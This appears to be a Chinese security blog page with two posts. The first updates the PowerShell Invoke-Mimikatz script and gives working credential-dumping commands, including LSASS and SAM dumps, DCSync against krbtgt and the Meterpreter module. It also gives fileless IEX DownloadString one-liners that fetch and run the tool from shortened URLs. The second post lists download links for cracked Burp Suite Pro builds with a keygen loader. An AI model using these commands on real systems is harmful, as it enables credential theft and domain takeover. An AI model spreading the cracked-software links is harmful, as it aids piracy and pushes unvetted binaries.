更新 Invoke-Mimikatz.ps1 中的 Mimikatz 版本为最新 2.2.0 20200519 版本 技术文章

shotpic_2020-06-24_12-26-38.png



invoke-mimikatz是什么?invoke-mimikatz是powersploit渗透测试套装中的一个powershell版本的mimikatz工具,用来抓取windows操作系统中的密码。

但是其内置的mimikatz版本过低,导致在实际使用中会多多少少的有一些问题。



通过查看 https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1 脚本内容知道 $PEBytes64 和 $PEBytes32 变量,应该是把 Mimikatz 的两个版本的EXE文件进行base64编码.

那就只替换最新的试试,使用 python3 替换完成更新代码 update.py 如下: 

import fileinput
import base64

with open("./Win32/mimikatz.exe", "rb") as f:
    win32 = base64.b64encode(f.read()).decode()

with open("./x64/mimikatz.exe", "rb") as f:
    x64 = base64.b64encode(f.read()).decode()

for line in fileinput.FileInput("./Invoke-Mimikatz.ps1", inplace=1):

  line = line.rstrip('\r\n')
  if "$PEBytes64 = " in line:
    print("$PEBytes64 = '" + x64 + "'")
  elif "$PEBytes32 = " in line:
    print("$PEBytes32 = '" + win32 + "'")
  else:
    print(line)

将 update.py 脚本和 Invoke-Mimikatz.ps1 放在 mimikatz_trunk 解压后的同目录。执行即可更新完毕。

更新后的效果如首图所示,从 Mimikatz 2.1 2016年的版本更新到最新的 2.2.0 20200519 Windows 10 2004 (build 19041) 版本。

顺带提一下:Mimikatz 使用时需要高权限,至少是 administrator 权限 Mimikatz 抓取密码的命令需要 system 权限,可以先进行提权,

基本使用:

privilege::debug  //提升权限(从administrator提升到system)如果是system权限执行,可省略



抓取hash:

sekurlsa::logonpasswords   //获取当前在线用户的明文密码(需要高权限运行)

lsadump::lsa /patch   //获取当前此计算机存在过用户的NTLMHASH



mimikatz 的其他命令:

lsadump::sam SYSTEM.hiv //导出所有用户口令 使用Volue Shadow Copy获得SYSTEM、SAM备份

通过内存文件获取口令

sekurlsa::minidump lsass.dmp

sekurlsa::logonPasswords full

拉取 rd.adsecurity.org 域中的 KRBTGT 用户帐户的密码数据

lsadump::dcsync /domain:rd.adsecurity.org /user:krbtgt

拉取 lab.adsecurity.org 域中 ADSDC03 域控制器的计算机帐户的密码数据

lsadump::dcsync /domain:lab.adsecurity.org /user:adsdc03$



msf使用 mimikatz:

在meterpreter中加载mimikatz模块

load mimikatz



然后help,查看参数信息:

kerberos          Attempt to retrieve kerberos creds

livessp           Attempt to retrieve livessp creds

mimikatz_command  Run a custom command

msv               Attempt to retrieve msv creds (hashes)

ssp               Attempt to retrieve ssp creds

tspkg             Attempt to retrieve tspkg creds

wdigest           Attempt to retrieve wdigest creds



常用命令为kerberos和msv。



无文件落地执行 mimikatz 

在Windows server 2008 及之前 可以使用如下命令:

powershell "IEX (New-Object Net.WebClient).DownloadString('https://url.cn/SdU3mjdm'); Invoke-Mimikatz -DumpCreds" 

在Windows server 2009 及之后,可以使用如下命令:

powershell "IEX (New-Object Net.WebClient).DownloadString('https://url.cn/wv7uNQrc'); Invoke-Mimikatz"

然后抓取hash即可抓取 NTLM。

注意,目前上面这个新版的脚本来自我的 GitHub 仓库: https://github.com/Mr-xn/Penetration_Testing_POC/blob/master/tools/Invoke-Mimikatz.ps1

各位大佬点个star啊!里面收藏了我所看到过的觉得有价值的渗透测试工具,POC,Android渗透测试、脱壳相关的文章。

目前会有 BUG ,细心的可以看到图上的第二个命令行窗口。欢迎能修复BUG的大佬可以 Pull !



参考:鸿鹄实验室公众号文章-渗透tips---->更新你的invoke-mimikatz


admin 发布于  2020-6-24 12:27 

Burp Suite Professional Edition v2020.5 x64 & Burp_Suite_Pro_v2020.5_Loader_Keygen下载---update_to_burpsuite_pro_v2020.11.3.jar 安全工具

先上图:
burpsuite_pro_v2020.9.2.png
Burp Suite Professional Edition v2020.5 x64 & Burp_Suite_Pro_v2020.5_Loader_Keygen下载,官方更新日志:

You can now choose to display non-printing characters as "lozenges" in the HTTP message editor. This is supported for any bytes with a hexadecimal value lower than 20, which includes tabs, line feeds, carriage returns, and null bytes.

This feature will be greatly beneficial for many use cases, including:

Spotting subtle differences between byte values in responses

Experimenting with HTTP request smuggling vulnerabilities

Studying line endings to identify potential HTTP header injection vulnerabilities

Observing how null-byte injections are handled by the server

Non-printing characters are hidden by default, but you can toggle the lozenges on and off by clicking the "\n" button at the bottom of the editor.

These non-printing characters can currently only be displayed in the message editor. For now, you have to edit bytes using Burp's hex view. However, we plan to enable you to do this directly in the message editor in the near future.

修复一些bug:


We have also implemented several minor bug fixes, most notably:
The response received/completed times are now displayed for 401 responses.
The response time is now displayed even when the time taken was < 1ms.
"Check session is valid" session handling rules are now applied properly when session tracing is running
The content discovery tool no longer erroneously displays the "Session is not running" message.
This release also provides the following minor improvements to various areas of Burp: The embedded Chromium browser for the experimental browser-driven scanning mode has been upgraded to version 83. Java 14 is now supported for both Professional and Community Edition. Burp Proxy no longer intercepts requests for SVG or font files by default. Crawling of static content is now faster.

下载地址:

---------------------------------------------------------------------

2020/12/02 update burpsuite_pro_v2020.11.3.jar

https://cloud.189.cn/t/JbqUJ3QrEfqa(访问码:5sri)

没有意外不会在分享了,burp官网可以公开下载了。

---------------------------------------------------------------------

2020/11/28 update burpsuite_pro_v2020.11.2.jar

https://cloud.189.cn/t/eM3yUrJniiIv(访问码:30ta)

---------------------------------------------------------------------

2020/11/20 update burpsuite_pro_v2020.11.1.jar:

https://cloud.189.cn/t/ieYRBzjUBzUb(访问码:waq8)

https://mega.nz/folder/aU8QBCIC#1vu1C1zXFFUZonO-uCLLlg

---------------------------------------------------------------------

2020/11/10更新burpsuite_pro_v2020.11.jar下载:

链接:https://cloud.189.cn/t/MvInAb6vQRZr  访问码:b8ul

$ shasum -a 256 burpsuite_pro_v2020.11.jar&&md5 burpsuite_pro_v2020.11.jar

8ea15e1a0a5b742744afb7e1ab25759081e468eee6a853d7a8546ec3b5c6096c burpsuite_pro_v2020.11.jar

MD5 (burpsuite_pro_v2020.11.jar) = 9d0dea6acc6b8570fd9c9c32eb981474


---------------------------------------------------------------------

2020/10/20更新burpsuite_pro_v2020.9.2.jar下载:
链接:https://cloud.189.cn/t/RneiMvraeiIr(访问码:q1es)
https://mega.nz/folder/yRkGHBwQ#r5a8fxZSEJ_HGnxZ7eZ39Q

---------------------------------------------------------------------

2020/09/05更新burpsuite_pro_v2020.9.1.jar下载:

https://cloud.189.cn/t/BVnyUvEVbiUb(访问码:lpy8

https://mega.nz/folder/bNkgzYIC#qK7ET0ddW9wYjrWT8pke1Q


Downloads shasum -a 256 burpsuite_pro_v2020.9.1.jar

ad79a1a7c3ab7a7714608ff7bb88a29d2b490a3e4b02ede2a61da6d3213dd08b burpsuite_pro_v2020.9.1.jar

Downloads md5 burpsuite_pro_v2020.9.1.jar

MD5 (burpsuite_pro_v2020.9.1.jar) = bfd49439d8aeace81a704e82b43dca74

---------------------------------------------------------------------
2020/09/04更新burpsuite_pro_v2020.9.jar下载:

https://cloud.189.cn/t/e2MniiUfMRje(访问码:wkw8)https://mega.nz/folder/XA1HQbpI#x9oKlzY_n4_gVWg6BuE8PQ


Downloads shasum -a 256 burpsuite_pro_v2020.9.jar

8175e78a42f2959a05830cbf7f082f50edec2ad3dcc58d8609980063a1c91686 burpsuite_pro_v2020.9.jar

Downloads md5 burpsuite_pro_v2020.9.jar

MD5 (burpsuite_pro_v2020.9.jar) = bccee79151a2648d33e29da081703c9c

---------------------------------------------------------------------

2020/08/22更新burpsuite_pro_v2020.8.1.jar&burpsuite_pro_linux_v2020_8_1.sh下载:

https://cloud.189.cn/t/uq6Bveyu6Vfy(访问码:e3te

https://mega.nz/folder/LAthQZxQ#24CefPgmwT3j9n8EpsYLtw

jar_burp_8.1_hash.png
linux_burp_8.1_hash.png

---------------------------------------------------------------------

2020/08/07更新burpsuite_prov2020.8.jar下载:

https://cloud.189.cn/t/JrUFNj3yYriu (访问码:6f4r)

https://mega.nz/folder/rZ1RkIzK#G2iwuZgxi1uyrSLI
-upyg
---------------------------------------------------------------------
2020/07/18更新burpsuite_pro_v2020.7.jar下载:

https://cloud.189.cn/t/INvu6fyIFvEb(访问码:ox2w

https://mega.nz/folder/eY1nEQAD#4uuJzQkl8gHRpggLbzUi0Q
---------------------------------------------------------------------

2020/07/05更新burpsuite_pro_v2020.6.jar下载:

https://cloud.189.cn/t/6vy6NnbY7FNv(访问码:2cua

https://mega.nz/file/TFEmhIpY#wvBqsNVkFMs0zMz6yec8GHNoMKAVLkl-JnVIG4gNDLg

---------------------------------------------------------------------

2020/06/21更新burpsuite_pro_v2020.5.1.jar下载:

https://cloud.189.cn/t/YFjIbmu6BzQb(访问码:xp6t

https://mega.nz/folder/SFNyXI5L#bTSK9CEQ9u6dl-tR03jOJg

burpsuite_pro_v2020.5.1_noJDK.7z下载:

https://cloud.189.cn/t/EB7VRfmIv2Y3(访问码:toq7

---------------------------------------------------------------------

单独的
burpsuite_pro_v2020.5.jar下载:
https://cloud.189.cn/t/eEB3a2FN3e2m(访问码:b678
https://mega.nz/file/SQ82RYzS#DsWfmm1i6pjr_Ob6gpfwyigdPUJauM2pCHQwfbzOZvs
单独的激活包kegen loader没有JDK,下载:
https://cloud.189.cn/t/ai2yeuE3qiua(访问码:q9t8
https://mega.nz/file/vMkEgYRZ#S-35eQEJuxcRxhl3P0o7Jg4-ASHQyT0pAP73AYObrcc

jdk-11.0.7.7z 下载:
https://cloud.189.cn/t/Mb6n6fbiAfAv

https://www89.zippyshare.com/v/t3ulVWpo/file.html
https://mega.nz/file/vMNBUQhD#Q8A6gAhak4hX8eD2hc6_Jg_TgCmXcYs4M8aCmZFQlhE
总包下载:
不重复上传了,直接下载上面的单独的JDK+单独的激活包kegen loader没有JDK解压到一起就可以直接使用了。
文件目录结构参考这里:

如果之前有使用过破解版的,就不需要再次激活了。直接创建桌面快捷方式就OK。详情可以看前一篇burp2020.4.1的激活下载那篇文章:https://mrxn.net/hacktools/663.html
如有遗漏,还请见谅.
有能力就支持正版吧。
同样的,资源来自于互联网,我只是做了整合,适合自己使用的习惯罢了。


admin 发布于  2020-6-7 15:27